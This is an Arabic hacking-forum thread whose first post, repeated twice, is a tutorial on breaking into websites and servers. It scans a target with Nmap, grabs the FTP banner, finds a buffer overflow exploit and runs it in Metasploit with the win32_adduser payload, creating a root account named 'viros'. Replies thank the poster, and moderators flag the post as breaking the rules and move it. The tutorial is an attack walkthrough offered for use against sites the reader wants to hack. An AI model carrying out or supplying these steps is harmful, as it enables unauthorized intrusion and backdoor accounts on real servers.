اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت

شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت


النتائج 1 إلى 6 من 6

الموضوع: شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت

  1. #1
    محظور Array
    تاريخ التسجيل
    Sep 2009
    المشاركات
    49

    افتراضي شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت



    شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت


    بسم الله الرحمن الرحيم

    السلام عليكم و رحمة الله و بركاته

    أقدم لكم شرح الاختراق المتقدم

    و هي طريقة الأختراق الأحترافيه


    طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند.....

    و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه

    و اللي منها طريقتنا اليوم و هي الأختراق عن طريق البرامج المركبه على السيرفر أو الموقع

    حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع

    ول من لم يظهر له الشرح فليحمله من هنا :

    تحميل الشرح مع الصور بصيغة HTML

    اللي راح تتعلمه من الشرح:-
    1-استخدام أداة Nmap الشهيره.
    2-التعامل مع أداة M e t a s ploit.
    3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا.

    متطلبات الشرح:-
    1-أداة Nmap

    2-أداة M e t a spliot

    لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت


    نبدأ الشرح على بركة الله



    أمر البحث

    nmap -P0 http://www.site.com/

    مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/

    و زي ما نشوف البرامج المركبه على الموقع مع المنافذ

    الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره))

    ابدأ=>تشغيل=>telnet



    نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21

    21 منفذ الــFTP



    هنا طلع لنا اسم البرنامج

    الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه

    FTP port 21 Buffer Overflow Exploit

    و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا

    بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره



    هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm

    تاخذ الثغره للمسار هذا

    C:\Program Files\M e t a sploit\Framework2\home\framework\exploits

    و تروح الأن و تفتح أداة الميتا بالذهاب للمكان اللي ثبت الاداة فيه

    راح تلقاها باسم msfconsole.exe



    show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج






    use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)



    show options أمر اظهار الخيارات

    RHOST = الموقع
    RPORT = المنفذ

    أهم شئ هو الموقع أما المنفذ ماهو لازم



    set RHOST http://www.site.com/ امر اظافة الموقع

    و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ





    use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)



    show options أمر اظهار الخيارات

    RHOST = الموقع
    RPORT = المنفذ

    أهم شئ هو الموقع أما المنفذ ماهو لازم



    set RHOST http://www.site.com/ امر اظافة الموقع

    و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ



    show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره

    و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه



    set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره

    الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي

    set PASS viros اضافة الباسوورد viros
    set USER viros اضافة اليوزر viros

    شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت



    بسم الله الرحمن الرحيم

    السلام عليكم و رحمة الله و بركاته

    أقدم لكم شرح الاختراق المتقدم

    و هي طريقة الأختراق الأحترافيه


    طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند.....

    و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه

    و اللي منها طريقتنا اليوم و هي الأختراق عن طريق البرامج المركبه على السيرفر أو الموقع

    حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع

    ول من لم يظهر له الشرح فليحمله من هنا :

    تحميل الشرح مع الصور بصيغة HTML

    اللي راح تتعلمه من الشرح:-
    1-استخدام أداة Nmap الشهيره.
    2-التعامل مع أداة M e t a s ploit.
    3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا.

    متطلبات الشرح:-
    1-أداة Nmap

    2-أداة M e t a spliot

    لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت


    نبدأ الشرح على بركة الله

    أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 642x463 وحجمها 60KB.


    أمر البحث

    nmap -P0 http://www.site.com/

    مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/

    و زي ما نشوف البرامج المركبه على الموقع مع المنافذ

    الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره))

    ابدأ=>تشغيل=>telnet



    نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21

    21 منفذ الــFTP



    هنا طلع لنا اسم البرنامج

    الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه

    FTP port 21 Buffer Overflow Exploit

    و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا

    بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره



    هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm


    تاخذ الثغره للمسار هذا

    C:\Program Files\M e t a sploit\Framework2\home\framework\exploits

    و تروح الأن و تفتح أداة الميتا بالذهاب للمكان اللي ثبت الاداة فيه

    راح تلقاها باسم msfconsole.exe



    show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج


    أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 756x321 وحجمها 68KB.



    use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)



    show options أمر اظهار الخيارات

    RHOST = الموقع
    RPORT = المنفذ

    أهم شئ هو الموقع أما المنفذ ماهو لازم



    set RHOST http://www.site.com/ امر اظافة الموقع

    و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ

    أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 657x285 وحجمها 57KB.

    show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره

    و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه



    set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره

    الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي

    set PASS viros اضافة الباسوورد viros
    set USER viros اضافة اليوزر viros

    أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 680x268 وحجمها 40KB.

    اظهار الخيارات و راح نشوف ان المعلومات انحفظت




    exploit أمر الأستغلال و زي ما راح تشوفون ان فيه كلام راح يطلع زي اللي بالصوره و ان شاء الهل الثغره تظبط

    و بعد ما ينسجل حساب الرووت تروح تتصل بالسيرفر بأي برنامج اتصال زي برنامج putty سوف يتم شرحه باذن الله

    ========================

    و الى هنا نكون وصلنا لنهاية الشرح

    أتمنى ان الشرح كان واضح

    و اذا فيه أي خطأ سامحوني عليه لان الأنسان غير معصوم من الخطأ

    و في الختام تقبلوا تحياتي





  2. #2

    افتراضي رد: شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت

    مشكور اخي على جهودك ولكن الموضوع مكانه مش هون

    يتم النقل


  3. #3
    هكر مجتهد Array الصورة الرمزية sahrawi7
    تاريخ التسجيل
    Dec 2009
    المشاركات
    444

    افتراضي رد: شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت

    مخالف يا حبيبي على العموم واصل تميزك بارك الله فيك اخي



  4. #4
    هكر مبتديء Array الصورة الرمزية آح س اني هكر
    تاريخ التسجيل
    Jul 2010
    المشاركات
    51

    افتراضي رد: شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت

    مشكور آخوي ع الموضوع الجميل


  5. #5
    هكر مجتهد Array الصورة الرمزية نائل_2009
    تاريخ التسجيل
    Jun 2010
    المشاركات
    244

    افتراضي رد: شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت

    مشكوووووووووووووووووووووو ر


  6. #6
    :: إدارة :: Aljyyosh Team Array الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    افتراضي رد: شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت

    موضوع مخالف

    ينقل لقسم المواضيع المخالفة والمكرره



المواضيع المتشابهه

  1. الاختراق المتقدم (m-e-t-a-s-p-l-o-i-t)
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 39
    آخر مشاركة: 03-05-2013, 08:53 PM
  2. فيديو الاختراق عن طريق الميتا سبلوت وبدون ارسال اي ملف للضحيه
    بواسطة Mr.DaGaA في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 125
    آخر مشاركة: 10-28-2012, 04:42 PM
  3. محاولات فاشلة فى استخدام الميتا ارجوكم مساعدتى
    بواسطة سيف الاسلام1 في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 5
    آخر مشاركة: 07-03-2010, 07:24 PM
  4. الميتا لا يحمل القواعد
    بواسطة ABA_0oo0 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 02-20-2010, 12:32 AM
  5. استعمال بعض خصائص الarrayقي السي شاربC#
    بواسطة ASDELY-ScOrPiOn في المنتدى لغات برمجة المواقع
    مشاركات: 3
    آخر مشاركة: 01-13-2010, 01:53 PM

وجد الزوار هذه الصفحة بالبحث عن:

الاختراق المتقدم

نقل السيرفر فى الميتا 4

اختراق المواقع و السيرفرات بإستخدام أداة الميتا

اسخدام الفلاش كاداة للاختراق

شرح استخدام اداه ال Set فى اختراق الاجهزه

site:aljyyosh.com metasploit 32 aljyyosh

استخدام اداة nmap

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •